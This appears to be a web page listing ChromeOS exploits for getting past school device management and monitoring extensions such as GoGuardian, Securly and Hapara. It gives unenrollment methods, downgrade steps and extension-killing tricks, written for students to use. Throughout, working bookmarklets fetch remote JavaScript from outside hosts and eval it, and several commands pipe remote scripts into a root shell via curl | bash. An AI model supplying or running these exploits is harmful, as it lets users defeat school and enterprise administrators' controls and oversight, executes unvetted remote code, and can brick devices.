This is a curated list of exploits for ChromeOS. It started with LTBEEF, and now there is more! Many of these exploits can destroy your computer if misused. So PLEASE, PLEASE make sure you follow these instructions very carefully!
Need help? Ask for help here!
Please use these only when you have permission, I (3kh0) do not condone the use of any exploits for illegal purposes!
Image Credit: LittleMissNyan
Thank you to all of the contributors! Y'all really are pretty epic :D
CryptoSmite is an exploit capable of completely unenrolling enterprise-managed Chromebooks. It was found by FWSmasher and released on March 9th, 2024.
This exploit has been patched since Chrome OS 120.
If you’re on v120 or higher, you need to downgrade in order to use CryptoSmite. To do this, you first need to check your kernver= in Recovery Mode.
kernver= ends with a 2!
Congratulations, you can downgrade to v119 or lower! Follow the instructions at Downgrading Change versions on how to downgrade.
kernver= ends with a 3!
Sorry, you can’t downgrade to v119 or lower. Wait for a new unenrollment exploit or do a dangerous hardware modification.
Enter
Y then press enter, and it’ll automatically reboot upon completion.
CTRL + ALT + E on the Wi-Fi screen.
SH1MMER is an exploit capable of completely unenrolling enterprise-managed Chromebooks. It was found by the Mercury Workshop team and was released on Friday, January 13th, 2023.
Due to the detail this exploit requires, please check out the official website: sh1mmer.me
This exploit has been patched since Chrome OS 111.
Mercury Workshop received a notice from Google™️ that they had to take down their builder and shims. Currently, it is being rehosted by multiple community members.
An exploit that allows for access to sites outside of the Hapara Focus Session.
Your teacher may still be able to see your screen, but they won’t think you are doing anything wrong because of the focus session.
YOU MUST HAVE data: LINKS ALLOWED. IF YOU DON’T HAVE THOSE ALLOWED, THIS WILL NOT WORK.
data:text/html,<!DOCTYPE html> <html> <head> <title>full screen iframe</title> <style type="text/css"> html { overflow: auto; } html, body, div, iframe { margin: 0px; padding: 0px; height: 100%; border: none; } iframe { display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden; } </style> </head> <body> <iframe src="https://www.google.com.au" frameborder="0" marginheight="0" marginwidth="0" width="100%" height="100%" scrolling="auto" id="google"> </iframe> </body> </html>
An exploit that allows for unrestricted internet access outside of GoGuardian’s control.
Teachers can still see your screen, but they can’t block or close any of your tabs.
YOUR TEACHER NEEDS TO HAVE SET A TAB LIMIT. TRY OPENING TONS OF TABS TO CONVINCE THEM TO ENABLE TAB LIMITS.
javascript: window.onbeforeunload = ()=>{return false;}
about:blank pages.
Prevent from creating additional dialogues.
An exploit that allows for browsing within a completely unblocked Chrome browser. It works on ChromeOS 118 and a wide range of previous versions.
Bypassi made a wonderful slideshow for you goofballs to follow and view using any of the links below!
img/skiovox.pdf
LTBEEF (Literally The Best Exploit Ever Found) is an exploit found by Bypassi (Bypassi#7037) in September 2022 and is a great way to disable spyware installed on your Chromebook by your school.
Use either of the two bookmarklets below. The instructions are the same for both.
Please note that this exploit has been patched for quite some time.
javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});
javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())
Formerly named “Locked Mode Hack,” this Chrome OS exploit uses the locked mode feature to soft disable force-enabled extensions on managed accounts (Excluding Hapara Highlights and Read&Write if installed).
This exploit is patched in Chrome OS 111.
javascript:(function(){if (location.hostname == "docs.google.com") {document.body.innerHTML = document.body.innerHTML.replace("Locked mode is on", "Are you ready to turn off extensions?%22);%20document.body.innerHTML%20=%20document.body.innerHTML.replace(%22You%20have%20already%20opened%20and%20closed%20this%20quiz.%20Opening%20this%20quiz%20again%20will%20notify%20the%20form%20owner%20by%20email.%22,%20%22This%20will%20reload%20all%20tabs%20in%20your%20browser%22);%20var%20button%20=%20document.getElementById(%27mG61Hd%27);%20button.innerHTML%20=%20button.innerHTML.replace(%22Start%20Quiz%22,%20%22Disable%20Extensions%22);%20button.addEventListener(%27click%27,%20function(event){window.close();})}%20else%20{window.open(%22https://docs.google.com/forms/u/0/d/e/1FAIpQLSf5EYwrSUjmQhBOasMpORZy80eBCYb7qCpEwWNoRPUGyObGMA/startquiz%22);}})()
LoMoH HTML Additional Notes: You must create your link with the button on the page for locked mode to work within your organization/district. If this is patched for you, you will get rickrolled attempting to perform this exploit. This is just a heads-up for those who do happen to read this.
Literally The Meatiest Exploit of All Time
chrome://extensions, chrome://extensions-internals, and chrome://process-internals are all good places to find your extension’s ID (a 32-character lowercase string). You can also do a simple Google search. Once you have your ID, substitute it into the hostname in the URL below:
chrome-extension://extensionidhereblahblah/manifest.json
For some filters like Securly, the block screen is already an extension page.
chrome://kill (B) and chrome://hang (C).
chrome://kill bookmark (B). The page should crash. You should already have the next step prepared.
chrome://hang (bookmark C) and quickly reload the page while spamming (ideally with the refresh key on your keyboard or ctrl+R). You should have reloaded within one or two seconds of killing the page.
Exploit made by Bypassi#7037, learn why this works.
I had far too much faith in society when making this page. Some of you skids out there are really, really stupid and also can’t read. So here are the answers to some commonly asked questions.
How do I get an extension ID?
Okay, fair. Extension IDs are leaked in a couple of places. Generally, the best way to get them is to go to extension settings and copy the URL query value.
It says blocked by client?
That’s the message you get when you try to visit a page belonging to an extension that doesn’t exist. The error message (ERR_BLOCKED_BY_CLIENT) is highly misleading. Nobody blocked it. You need to find the correct extension ID (see above).
If you got this because you tried to visit the extension_id_here example URL, you should be extremely ashamed of yourself. Please change and grow as a person.
I don’t have a bookmarks bar!!!!
First, try running ctrl+shift+B. If that doesn’t work, go to chrome://settings and turn on the “home button” feature, then set it to chrome://hang. A home icon in the top left should appear to the right of your refresh icon. Use that instead of bookmark C.
There is a version where you don’t need bookmarklets, but I am currently gatekeeping it (L). Check this site daily to see if new alternate instructions have been posted.
I disabled an extension, but now I can’t load websites!
If you just read the write-up, you’d know this would happen if the extension’s background page loaded and its listeners were already initialized before you used chrome://hang. You can double-check whether the extension is listening using chrome://extensions-internals, assuming you have a few brain cells in your head.
Anyway, no listeners mean you were too slow. Either you waited more than three seconds between bookmark B and reloading the page, or you needed to be spamming bookmark C faster. The most reliable fix is to restart your computer and try again. Try to match the pace of the gif below: (note the reload)
The bookmarks don’t do anything when I click them!
Might be admin-blocked. Either be smart enough to figure out another way or check this site daily to see if new alternate instructions have been posted.
I disabled the extension. Why is some stuff still blocked?
I have bad news for you… not all filters are Chrome Extensions. Again, make sure the extension pages (like bookmark A) are frozen before you assume that your skiddy self successfully did the exploit.
Close everything and you’re good to go. If it didn’t work, try adjusting the number of open tabs. This is the LTMEAT Flood Method, and also unofficially called Alternate Method # 2. Enjoy a much longer life of LTMEAT!
Not working? Ensure you open a large set, but not too large, of extension tabs (_/generated_background_page.html or /manifest.json) for a permanent freeze.
A method of using LTMEAT that does not require chrome:// URLs. This works by using 80-150 tabs to soak up memory.
chrome://extensions/?id=extension_id_here and name it Kill switch.
spam.js. Next, paste this link into your browser: chrome-extension://extension_id_here/background.js
Add Page. Press Enter.
Bookmark Manager. You should see your page. Click on it and hit Ctrl+C. Press Ctrl+V until you have 38 of them.
Open All (38).
This page is taking too long popup appears. This will take 30-60 seconds. If it doesn’t, do chrome://restart and go back to step 2. Add 3-4 more pages to the folder.
Duplicate. Then, go to your Kill switch bookmark and look for a switch to flip, Allow Access to File:// urls. Then, click on the leftmost extension tab (one that opened from the main.js folder) and click Close all tabs to the right. KEEP THIS TAB OPEN!!!
Tips: Go to chrome://settings/performance and turn Memory Saver off, and in the box where it says Keep these sites always active, paste in the extension URL. I’ve noticed clicking on one of the tabs from the second batch seems to help with reliability.
BABY METHOD FOR THE TECHNOLOGICALLY CHALLENGED.
chrome-extension://extension_id_here page, then type chrome://hang in the URL bar of that tab. It should start loading infinitely.
chrome://extensions page for the blocker extension you want to Disable.
Allow access to file URLs, click that switch. If you don’t see any clickable switches, this exploit will not work.
Ctrl+P. A print window should show up, with several pages in the top right.
chrome://extensions.
Allow access to file URLs.
First, find your extension’s ID. This is a 32-character code found on your extension’s settings page, normally near or at the top.
Then go to chrome-extension://extension_id_here/manifest.json
Credit to Bypassi for the original LTMEAT framework, and to Swordmaster4321 for discovering that pages can be hung with printing.
Dextensify is an exploit that lets you disable most admin-installed Chrome extensions from any webpage. It can be used from regular websites, HTML files, and data URLs.
Go here and follow instructions: Dextensify Main HTML, or download the file here Dextensify.html
Download mirror: ftp.3kh0.net
Made by ading2210
Requirements
chrome://serviceworker-internals
chrome://serviceworker-internals
Inspect button, and execute the LTBEEF code
chrome.management.setEnabled('extension_id_here',false)
Thanks to Nyaann#3881 for this exploit
Corkey does indeed include power washing the Chromebook, which wipes local data including everything under “My files,” so I suggest you select everything you want to drag and back up to Google Drive if that’s available for your account.
chrome://extensions, turn on WiFi, and wait for your school’s blocking extension to appear.
A bookmarklet capable of installing extensions, for those without an allowlist.
ext-launcher-bookmarklet.js and save the code as a bookmarklet.
This exploit allows you to execute scripts on extension pages. This is a great example of how Chromebooks are a piece of garbage.
newpointblank.js and save the code as a bookmarklet on your Chromebook.
If it says blocked by Chrome, reload (you have to actually have Securly ofc)
If your school updated GoGuardian, this exploit may not work.
This works only for iBoss and Blocksi. If you don’t have one of these, use New Point Blank.
iBoss: tinyurl.com/byeswamp
Blocksi: tinyurl.com/blockboss
Then bookmark the code below:
javascript:opener.eval(`fetch("https://rounded-boiling-flax.glitch.me/uboss.js").then(data=>{data.text().then(e=>{eval(e)})})`) && close();
If it doesn’t work, let us know by creating a discussion. This was made in partnership with akabutnice and bypassi.
This exploit keeps your Chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by Catakang#0987. Using onc files, you can convince your Chromebook that the WiFi that you’re connected to is pay-to-use (like a hotspot using data), and thus it will not check for updates.
chrome://network#state
chrome://network#state.
+ sign next to the WiFi name of each network that you commonly connect your Chromebook to.
generate onc button below the textbox.
chrome://network#general.
import ONC button.
Extra notes
This alt exploit keeps your Chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by MechaXYZ. Using a Chrome flag, you can convince your Chromebook not to automatically update.
chrome://flags
chrome://flags#show-metered-toggle or search “metered” in chrome://flags instead.
Extra notes
Blank3r is an exploit that allows you to run bookmarklets on privileged pages, such as the Chrome extensions page. This exploit was made with Point Blank as well.
javascript:let shim = false;var ids = prompt("extension ids (comma separated)").split(",");setInterval(()=>{ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 145);
chrome://extensions.
/?id=.
If you close the tab, the exploit will stop working.
Downgrading can be used for several exploits, to get to a version that does not have patches for certain exploits, such as LTBEEF, SH1MMER, or CryptoSmite. This is a built-in feature of ChromeOS.
Please do note that depending on your kernver= you may not be able to downgrade to certain versions. More info is at the CryptoSmite Unenrollment section.
chrome://version on the Chromebook you wish to downgrade. If that is blocked try chrome://system/:~:text=CHROMEOS_RELEASE_DESCRIPTION, and check for your board under Platform. For me, that would be octopus.
ctrl+f and type in your board.
ctrl+alt+e to skip the “checking for updates” screen.
chromeOS User Policy Editor
There are two modes for this, I recommend just using the first one.
shell
sudo su
curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash
alt+vol_up+x.
Disabling RootFS will Soft-Brick your Chromebook when booting back into normal mode.
shell
sudo su
curl -Ls https://mercuryworkshop.github.io/Pollen/RootFS.sh | bash
curl -Ls https://mercuryworkshop.github.io/Pollen/PollenFS.sh | bash
Kill the extension by signing out.
chrome://settings/signOut.
chrome://restart
tinyurl.com/AddSession or this link
Credit to Zoroark
Shimboot is a collection of scripts for patching a Chrome OS RMA shim to serve as a bootloader for a standard Linux distribution. It allows you to boot a full desktop Debian install on a Chromebook, without needing to unenroll it or modify the firmware.
For more detailed information, please see the project’s README.
Credit to vk6 for this exploit
If your school allows the uBlock Origin chrome extension, then running any bookmarklet is possible.
Find userResourcesLocation and change it from unset to https://raw.githubusercontent.com/3kh0/ext-remover/main/ublockExec.js
*##+js(execute_script.js)
From Inglan2
Recently Google cracked down on bookmarklets and now they don’t work (it’s based on the DeveloperToolsAvailability policy). I wanted to run scripts still so I started making this, inspired by uBlock Run Run Code On Pages, but with more features, like saving scripts.
[!CAUTION] DO NOT MODIFY ANYTHING ELSE ON THIS PAGE, UNLESS YOU KNOW WHAT YOU ARE DOING (you probably don’t), AS YOU COULD BREAK SOMETHING.
[!TIP] If you mess up, go to the home of settings and at the bottom click reset to default settings
Change
userResourcesLocation unset
to
userResourcesLocation https://inglan2.github.io/uRun/urun.js
[!TIP] It’s down the bottom
- Set a filter to load uRun. After closing the advanced settings tab, go to the filters tab and add this:
*##+js(urun.js)
Simply press Ctrl + Shift + ` to open the menu and from there you can run and create scripts. To add a script, press the ➕ button up the top right, and enter the code you would like to add (without the javascript: part).
QuickView is a universal webview exploit in Chrome OS that utilizes the QuickOffice component extension. This exploit lets you create login windows with arbitrary URLs, thus allowing you to load pages without any extensions.
Go to quickview-exploit.pages.dev and follow the instructions
Visit any of the links below:
Devtools must not be blocked by policy to perform this exploit.
Go to this link and follow instructions
Credit to Coding4Hours
No idea whatsoever how this went through
THIS EXPLOIT WILL NOT WORK FOR YOU IF YOU HAVE ANY OTHER EXTENSION BESIDES GOGUARDIAN
chrome://restart to clear cached sites from GoGuardian
Credit to akabutnice
This exploit was removed in “The Great Reformatting of 2023” so I am gonna re-add it!!! Thanks a bunch Bill Gates
Do this! Not drugs!
NOTES: sound doesn’t work, a lot of websites are blocked, but it’s just fun to screw around in it.
(Not really) credit to mundaneunblocking